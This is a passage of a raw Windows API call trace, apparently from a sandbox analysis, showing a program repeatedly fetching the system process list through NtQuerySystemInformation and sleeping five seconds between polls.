Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.644] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.654] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.673] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.715] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.724] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.734] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.745] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.754] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.774] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.794] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.804] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.813] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.823] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.832] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) 